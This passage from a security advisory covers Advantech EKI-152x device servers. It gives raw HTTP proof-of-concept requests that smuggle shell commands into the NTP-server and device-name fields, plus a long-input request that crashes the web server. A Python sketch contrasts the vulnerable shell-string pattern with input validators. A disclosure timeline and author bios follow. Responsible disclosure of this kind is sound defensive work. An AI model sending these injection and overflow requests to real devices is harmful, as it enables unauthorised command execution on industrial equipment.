web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

It is also possible to execute this command without any interceptor proxy by enclosing it with ";", which results in the string ";ping 10.0.0.1;".

1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)

The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device’s web interface. A POST request which injects the command ";ls /etc;" can look like the following:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.100
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 541
Origin: http://172.16.0.100
Connection: close
Referer: http://172.16.0.100/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

Such a command can also be injected by setting the device name to ";ls /etc;".

2) Buffer Overflow (CVE-2023-2575)

The following POST request can be used to trigger a buffer overflow vulnerability in the web server:

POST /cgi-bin/index.cgi?func=setsys HTTP/1.1
Host: 172.16.0.97
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 823
Origin: http://172.16.0.97
Connection: close
Referer: http://172.16.0.97/cgi-bin/index.cgi

web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaa […] aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa […]
&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80

The serial port of the device provides error messages, which already indicate that the stack has been corrupted:

/ # *** Error in `./index.cgi': free(): invalid next size (normal): 0x00069828 ***
*** Error in `./index.cgi': malloc(): memory corruption: 0x00069898 ***

Furthermore, the forked child processes seem to remain in the process list as zombies – three buffer overflows were triggered in this case:

/ # ps
PID USER COMMAND
[…]
935 root ./index.cgi func=setsys
959 root ./index.cgi func=setsys
983 root ./index.cgi func=setsys
[…]
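Both injection points (sections 1.1 and 1.2) and the NTP length issue (section 2) come down to the same missing step: the field reaches a shell and a fixed-size buffer without validation. As an added example that is not Advantech's code, the Python below puts the unsafe pattern the advisory describes beside a validator that enforces hostname/IP syntax and the 64-byte limit the vendor states, and passes the value as an argv element rather than as part of a shell string; the same allow-list idea is applied to an upload filename, the vector shown at the top of this page (test.bin;ls${IFS}-la;). Command names, regexes and the device-name cap are assumptions.

```python
import ipaddress
import re

MAX_NTP_BYTES = 64   # length the vendor states for the NTP server string

_LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")
_DEVICE_NAME_RE = re.compile(r"^[A-Za-z0-9 _-]{1,32}$")        # assumed policy
_FILENAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")  # assumed policy


def unsafe_ntp_command(ntp_name: str) -> str:
    """The pattern behind CVE-2023-2573: the form field is pasted into a
    shell command line. With ntp_name set to ';ping 10.0.0.1;' the shell
    sees two commands, which is what the PoC above relies on. Hypothetical
    reconstruction of the vulnerable code, kept only for contrast."""
    return "ntpdate -u " + ntp_name


def validate_host(value: str, max_bytes: int = MAX_NTP_BYTES) -> str:
    """Accept an IPv4/IPv6 literal or a DNS hostname, nothing else, and
    enforce the byte limit before the value can reach a fixed buffer
    (the check that is missing in CVE-2023-2575)."""
    if not value:
        raise ValueError("empty host")
    if len(value.encode("utf-8")) > max_bytes:
        raise ValueError("host longer than %d bytes" % max_bytes)
    try:
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    if not all(_LABEL_RE.match(label) for label in labels):
        raise ValueError("not a valid hostname: %r" % value)
    return value


def safe_ntp_argv(ntp_name: str) -> list:
    """Build the command as an argv list for subprocess.run() without
    shell=True: ';' is never special, and the value has already been
    checked against an allow-list."""
    return ["ntpdate", "-u", validate_host(ntp_name)]


def validate_device_name(value: str) -> str:
    """Device name (CVE-2023-2574): same allow-list approach. Letters,
    digits, space, '-' and '_' up to an assumed 32 characters."""
    if not _DEVICE_NAME_RE.match(value):
        raise ValueError("invalid device name: %r" % value)
    return value


def safe_upload_filename(name: str) -> str:
    """Upload filename check: reject path components and anything outside a
    short allow-list, so a name such as 'test.bin;ls${IFS}-la;' never
    reaches a shell-built tar command."""
    if "/" in name or "\\" in name or name in (".", ".."):
        raise ValueError("path components are not allowed: %r" % name)
    if not _FILENAME_RE.match(name):
        raise ValueError("filename contains disallowed characters: %r" % name)
    return name


if __name__ == "__main__":
    print(unsafe_ntp_command(";ping 10.0.0.1;"))      # shows the injected second command
    print(safe_ntp_argv("pool.ntp.org"))
    for bad in (";ping 10.0.0.1;", "a" * 65, "test.bin;ls${IFS}-la;"):
        for check in (validate_host, safe_upload_filename):
            try:
                check(bad)
            except ValueError as exc:
                print("rejected:", exc)
```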

The vulnerability was manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Update the product to the latest available firmware version.

Workaround

None

Recommendation

CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.


References

Contact Timeline

  • 2023-03-08: Contacting Advantech via Service Request form; No answer.
  • 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendor responded that EKI-1524/1522/1521 series are affected.
  • 2023-03-20: Asked for status update.
  • 2023-03-21: Vendor responded that the firmware is currently under testing.
  • 2023-03-31: Vendor stated that the firmware is done and sent it via email; Found additional issues and responded to vendor.
  • 2023-04-01: Vendor asked multiple questions.
  • 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed.
  • 2023-04-04: Set date for a call to 2023-04-10.
  • 2023-04-10: Clarified further issues.
  • 2023-04-23: Vendor sent notification that a beta release of the firmware is available.
  • 2023-05-02: Vendor sent notification that a new firmware release is online.
  • 2023-05-04: Asked vendor if the advisory can be published earlier than agreed.
  • 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed.
  • 2023-05-11: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems, firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the “Austrian Cyber Security Challenge”, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.
